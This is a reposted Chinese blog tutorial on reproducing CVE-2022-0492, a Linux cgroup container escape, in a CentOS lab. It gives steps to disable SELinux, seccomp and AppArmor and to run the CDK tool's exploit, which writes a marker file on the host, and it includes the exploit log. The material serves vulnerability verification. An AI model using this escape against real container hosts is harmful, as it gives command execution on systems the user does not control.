碼上快樂

相關內容    簡體    繁體

centos CVE-2022-0492漏洞復現方法 簡單版

本文轉載自   查看原文   2022-04-07 21:54   1055 

1. 下載最新 的 cdk 下載鏈接 https://github.com/cdk-team/CDK/releases 

2、制作鏡像:Dockerfile如下

FROM ubuntu:20.04
LABEL MAINTAINER kmahyyg<16604643+kmahyyg@users.noreply.github.com>

RUN echo "nameserver 223.5.5.5" > /etc/resolv.conf
RUN sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list && \
apt update -y && \
apt install -y ca-certificates wget curl nano strace ltrace socat libcap2-bin && \
rm -rf /var/cache/apt

CMD ["/bin/bash", "-c", "sleep 9999"]

docker build -t rinchat/test:CVE-2022-0492 . 

已經上傳到鏡像倉庫rinchat/test:CVE-2022-0492 拉取即可

3. 臨時關閉selinux 

setenforce 0

開啟用戶命名空間

echo user.max_user_namespaces=15000 >/etc/sysctl.d/90-max_net_namespaces.conf
sysctl -p /etc/sysctl.d /etc/sysctl.d/90-max_net_namespaces.conf

當前目錄下有cdk 文件

4. docker run -d -v  `pwd`:/test  --security-opt "seccomp=unconfined" --security-opt "apparmor=unconfined"   --name test rinchat/test:CVE-2022-0492

 

docker exec 容器內執行:./cdk run abuse-unpriv-userns "touch /root/hacked"
查看宿主機是否有 /root/hacked 目錄有了則存在漏洞說明 容器內部可以執行宿主機命令

存在漏洞時候日志:

root@2de2c952ccf1:/test# ./cdk run abuse-unpriv-userns "touch /root/hacked"
2022/04/07 15:27:31 User-Defined Shell Payload: touch /root/hacked
2022/04/07 15:27:31 current cgroup for exploit: rdma
2022/04/07 15:27:31 user-defined shell payload is: touch /root/hacked
2022/04/07 15:27:31 Found hostpath: /var/lib/docker/overlay/648284107b18c61c6040f6f056307e4d7b8d55471af927b0581a5690d2e76f96/upper
2022/04/07 15:27:31 generate shell exploit with user-input cmd:

touch /root/hacked

final shell exploit is:

#!/bin/sh
touch /root/hacked > /var/lib/docker/overlay/648284107b18c61c6040f6f056307e4d7b8d55471af927b0581a5690d2e76f96/upper/cdk_cgres_XCXT

2022/04/07 15:27:31 shell script saved to /cdk_cgexp_XCXT.sh
2022/04/07 15:27:36 Execute Result:

 

測試發現4.11內核以上存在bug

內核下載鏈接:http://193.49.22.109/elrepo/kernel/el7/x86_64/RPMS/

docker 版本

[root@localhost ~]# docker version
Client: Docker Engine - Community
Version: 20.10.0
API version: 1.41
Go version: go1.13.15
Git commit: 7287ab3
Built: Tue Dec 8 18:54:00 2020
OS/Arch: linux/amd64
Context: default
Experimental: true

Server: Docker Engine - Community
Engine:
Version: 20.10.0
API version: 1.41 (minimum version 1.12)
Go version: go1.13.15
Git commit: eeddea2
Built: Tue Dec 8 18:58:04 2020
OS/Arch: linux/amd64
Experimental: false
containerd:
Version: v1.4.3
GitCommit: 269548fa27e0089a8b8278fc4fc781d7f65a939b
runc:
Version: 1.0.0-rc92
GitCommit: ff819c7e9184c13b7c2607fe6c30ae19403a7aff
docker-init:
Version: 0.19.0
GitCommit: de40ad0





免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 springboot漏洞復現(CVE-2022-22965) 【漏洞】臟管漏洞 CVE-2022-0847(復現) Zabbix登錄繞過漏洞復現(CVE-2022-23131) Dubbo 漏洞 CVE-2020-1948 復現+簡單修復 CVE-2018-7600 Drupal漏洞原理的簡單分析與復現 【漏洞復現】CVE-2022–21661 WordPress核心框架WP_Query SQL注入漏洞原理分析與復現 Spring Framework遠程代碼執行漏洞復現(CVE-2022-22965) OpenSSL CVE-2022-0778漏洞問題復現與非法證書構造 CVE-2022-22965 Spring Framework遠程代碼執行漏洞復現 Spring Cloud Function SpEL表達式命令注入(CVE-2022-22963)漏洞復現及分析
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM